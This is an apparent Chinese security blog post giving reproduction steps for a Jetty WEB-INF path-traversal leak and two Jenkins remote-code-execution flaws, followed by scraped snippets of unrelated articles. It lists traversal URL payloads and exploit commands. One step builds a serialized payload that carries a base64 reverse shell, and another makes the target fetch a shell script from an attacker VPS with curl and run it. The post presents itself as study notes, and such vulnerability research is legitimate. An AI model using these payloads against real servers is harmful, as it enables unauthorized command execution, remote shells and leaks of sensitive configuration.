首页 > 其他分享 >Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)

Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)

时间:2023-09-25 10:23:43浏览次数:44  
标签:xml web -- && Jenkins 2017 CVE

Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)

jetty 敏感信息泄露(CVE-2021-28169)

漏洞简介

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 /concat?/%2557EB-INF/web.xml 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

漏洞复现

直接在url路径请求如下地址

/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.

Jenkins 代码执行 (CVE-2017-1000353)

漏洞概述

Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

默认端口

8080

影响范围

所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)

漏洞复现

POC下载CVE-2017-1000353

  • 注意 运行jar包时必须使用JDK-1.8.0_291版本,否则失败
  1. 使用jar包生成 jenkins_poc.ser文件

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,反弹shell命令base64编码}|{base64,-d}|{bash,-i}"

  1. 启动监听
  2. 运行exp进行命令执行
python exploit.py 目标主机地址 jenkins_poc.ser

Jenkins 命令执行 (CVE-2018-1000861)

默认端口

8080

影响范围

Jenkins主版本 <= 2.153
Jenkins LTS版本 <= 2.138.3

漏洞复现

POC下载 awesome-jenkins-rce-2019

  1. 在VPS上创建shell.txt,文件中写入反弹shell命令
  2. 使用python开启http服务
python3 -m http.server 8080
  1. 本地使用python2执行exp脚本,将远程文件保存至目标主机
python2 exp.py 目标主机 "curl -o /tmp/1.sh  http://xxxx:8080/shell.txt"
  1. 使用python2执行exp脚本,使目标主机运行脚本文件反弹shell
python2 exp.py 目标主机 "bash /tmp/1.sh"

以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。

标签:xml,web,--,&&,Jenkins,2017,CVE
From: https://www.cnblogs.com/Pengj/p/17727318.html

相关文章

  • sv 变量赋值,参数传递
    systemverilog变量赋值,参数传递1、变量类型systemverilog中的变量可以分为两种,一种普通变量类型,一种是句柄变量类型。普遍变量跟C/C++中的普通变量一样,而句柄变量则与C/C++中的指针变量或者引用变量类似。内置类型,比如int,bit,这些类型定义的变量都是普通变量。自定义的cla......
  • 20个最佳实践提升Terraform工作流程|Part 2
    在上一部分,我们一同探讨了构建Terraform项目的一些策略,以及使用Terraform管理IaC的部分最佳实践。今天,我们将继续深入研究将Terraform代码提升到新水平的具体要点,希望能够为你和你的团队提供有意义的提示和指导。 标记资源当出现问题或试图找出基础设施的哪一部分导致......
  • CF1801D The way home
    原题翻译非常好的一个题,有两种做法方法1:flody+dp首先我们确定一个最优行走方案:从\(1\)号节点赚到足够钱后通过最短路到达\(x_1\),在\(x_1\)赚够足够钱后到达\(x_2\),在\(x_2\)赚够足够钱后到达\(x_3\),如此往复后到达终点现在我们有一个问题:从\(u\)到\(v\)的路......
  • 07_dialog窗口设置
      新建一个文件夹,跟之前一样,在Vscode终端里输入yarncreateelectron-appdialog。  在index.js里添加:  dialog是用于应用程序中临时的交互性消息、警告、提示或输入框。下面做两个小实验,第一个是打开文件选择对话框,第二个是退出应用程序的时候弹出选项框。  在......
  • VLAN 1
    VLAN(虚拟局域网)VLAN的概念:在一台交换机虚拟多个局域网,每个局域网用数字表示。如:VLAN10VLAN20同VLAN之间可以相互访问,如果划分VLAN之间就无法相互访问一个广播域造成广播泛洪所有的交换机都得收到影响。划分VLAN的好处是:1.减少广播造成的影响(因为VLAN划分是将一个大的网络......
  • 使用openssl生成根证书和服务器证书
    1、生成服务器私钥opensslgenrsa-outserver.key20482、根据服务器私钥文件生成证书请求文件,这个文件中会包含申请人的一些信息,所以执行下面这行命令过程中需要用户在命令行输入一些用户信息,随便填写,一路回车即可opensslreq-new-keyserver.key-outserver.csrYoua......
  • POI2019
    P6661Pomniejszenie还算正常的贪心P6661修改\(A\)与\(B\)高位尽可能多的数字相同,从第\(p\)位开始不同,第\(p\)位满足\(a[i]<b[i]\),把从\(p+1\)位到最后一位的数尽可能多的改成\(9\)。现在考虑位置\(p\)的选择:\(p\)满足的条件:1.从\(1\)到\(p\)中\(a[i]\)与\(b[i]\)不同(需要......
  • rac多路径下添加lun(centos 6)
    环境:OS:Centos6.9DB:11.2.0.4 1.虚拟机添加磁盘 2.每个登录查看磁盘情况节点1:[root@rac01bin]#lsblkNAMEMAJ:MINRMSIZEROTYPEMOUNTPOINTsr011:011024M0romsda8:0......
  • PHY结构
      PHY芯片包括MII/GMII(介质独立接口)子层、PCS(物理编码子层)、PMA(物理介质附加)子层、PMD(物理介质相关)子层、MDI子层。PCS(PHYSICALCODINGSUBLAYER):提供4B/5B编码、串并转换以及冲突检测功能,同时只要TxEN无效就提供“idle”信号给PMD层.PMA(PHYSICALMEDIUMATTACHMENT):提供......
  • Windows 安装Redis(图文详解)
    https://www.cnblogs.com/smile008/p/16676723.html Windows安装Redis(图文详解) 一、Redis是什么数据库?RemoteDictionaryServer(Redis)是一个开源的使用ANSIC语言编写、遵守BSD协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提......